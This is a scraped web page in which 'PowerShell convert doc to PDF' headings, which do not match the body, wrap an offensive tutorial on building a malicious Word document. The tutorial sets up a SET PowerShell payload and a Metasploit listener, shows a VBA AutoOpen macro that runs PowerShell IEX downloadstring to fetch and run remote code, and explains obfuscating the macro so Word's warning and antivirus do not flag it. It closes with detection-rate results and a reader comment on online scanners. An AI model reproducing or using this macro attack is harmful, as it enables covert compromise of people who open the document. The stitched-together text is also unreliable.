This creates duplicate copies in the new format, it does not convert in the sense of the word. What most people need is to convert the doc file to docx, not to make another copy in a different location.

1. Powershell Script To Convert Doc To Pdf Download For Mac Windows 10
2. Powershell Script To Convert Doc To Pdf Download For Mac Mac
3. Powershell Script To Convert Doc To Pdf Download For Mac

Powershell Script To Convert Doc To Pdf Download For Mac Windows 10

When performing something such as a mass mailer attack on a company, sending executables usually isn't the best option. That's why, in this tutorial, I'll be teaching you how to code a VBA script macro into a Word document in order to compromise a system. Combined with a little social engineering, this can be a very effective technique. Bonus: There's a really nice of this post thanks to (who has some really well-written tutorials by the way) in case you're having trouble with the formatting of this website. Things You'll Need. Microsoft Word.

The Social-Engineer Toolkit (preinstalled on Kali). Apache web server (preinstalled on Kali). The Metasploit Framework (also preinstalled on Kali) Bonus: I'll be using the same technique I used in to create and deliver the payload; so if you've read that, you can skip steps 1 and 2 below.

Step 1: Creating the Payload We'll be using the Social-Engineer Toolkit to create our payload. In this case, PowerShell proves very useful. To open SET, type this in your console: setoolkit. Scroll up to the top to find the interface that's connected to your network (in my case, that's 'eth0'). Find what I've highlighted, 'inet,' and next to it you'll find your local IP address (in my case, it's 10.0.0.13). This is what you'll input for your LHOST.

Next, it'll prompt you to type in a 'port for the reverse.' It's referring to the LPORT. Usually, I use 4444 as it's a meterpreter convention, but you can use any port you want so long as you remember it. Then it will prompt you if you want to 'start the listener now.' Type no; we'll do this manually later. For now we're done with SET.

Now we'll need to move that payload over to our Apache web server. To do so, open a terminal and type: mv /root/.set/reports/powershell/x86powershellinjection.txt /var/www/html/payload.txt However, if you're still using Kali Linux 1 (not 2), use this command: mv /root/.set/reports/powershell/x86powershellinjection.txt /var/www/payload.txt This is because, in Kali Linux version 2, the Apache root directory was moved to the 'html' folder inside of /var/www/. Now, simply type: service apache2 start And your web server should be started. Step 2: Setting Up the Listener Lastly, we need to set up a listener to wait for a meterpreter session. Fire up the Metasploit Framework by typing: msfconsole Once it loads, type: use multi/handler. Now, you could just paste a simple VBA script such as: Sub AutoOpen Dim exec As String exec = 'powershell.exe 'IEX ((new-object net.webclient).downloadstring('))' Shell (exec) End Sub (Note the double quotes in the PowerShell command; the escape character in Visual Basic is just typing the character twice.) Now, the next part is optional, but adds compatibility with the auto-open feature in PowerPoint and Excel using the AutoOpen and WorkbookOpen methods, respectively.

Sub AutoOpen AutoOpen End Sub Sub WorkbookOpen AutoOpen End Sub This would work, however, from my testing, if you leave the code un-obfuscated, Microsoft Word provides an extra warning to the user which won't show up if the code is obfuscated. Converting each character into its ASCII value by hand would be very tedious, so I wrote a Java program (yeah, I know, I'm going to learn Python soon) to automate the process. You can use the program with, but you can always compile and run the source code yourself if you want. Once you do, it will prompt you to input the un-obfuscated command.

Type this: powershell.exe 'IEX ((new-object net.webclient).downloadstring('))' Again, replacing 10.0.0.13 with your own local IP address. And there you go!

Now you don't have to worry about these types of attacks. (Thanks to for his comment asking about how to do this.) Final Notes I used pretty simple variable names (such as first, second, third, and last) in my obfuscation program, so I recommend that you replace them with more complex names and move the 'first =' lines around to make it harder for someone else to comprehend. Also, to combat some formatting issues, I used pictures instead of text in some places and added Pastebin links. Leave a comment if you want me to keep doing this or if you'd rather me do something else; I appreciate any feedback. Alright, that's it. Thanks for reading my second post, and happy hacking!

What AV are you using? Let me know so I can do some more testing. Because I'm limited to just one computer with MS Word in my own testing, I used windows defender, removed the personal data (such as the author) from the obfuscated malicious document, uploaded it to Dropbox and the downloaded it again.

Powershell Script To Convert Doc To Pdf Download For Mac Mac

When I opened it I didn't get any notification from windows defender, only the 'Security Warning' from MS Word that I showed in the article. Also, I uploaded the document used in this tutorial to nodistribute.com and it recieved a 0/35. PLEASE NEVER USE ONLINE SCANNERS.THEY ALL DISTRIBUTE!!!! I read a bomb news in krebsecurity about testing virus in online scanners and the guy who write the article showed also a leaked email from Avast with a huge list of all the online scanners like nodistribute,virustotal,and more.and here is the bomb' the email showed that all the online-scanners sell te results to Anti virus companys;like AVAST, AEG,KASPERSKY.and others.because there is to much money to make. In that article there was also showing how much approximatively they buy the virus from the online-scanners.

Powershell Script To Convert Doc To Pdf Download For Mac

SO PLEASE STOP USING ALL OFF THEM.it is like shooting a bullet in your leg.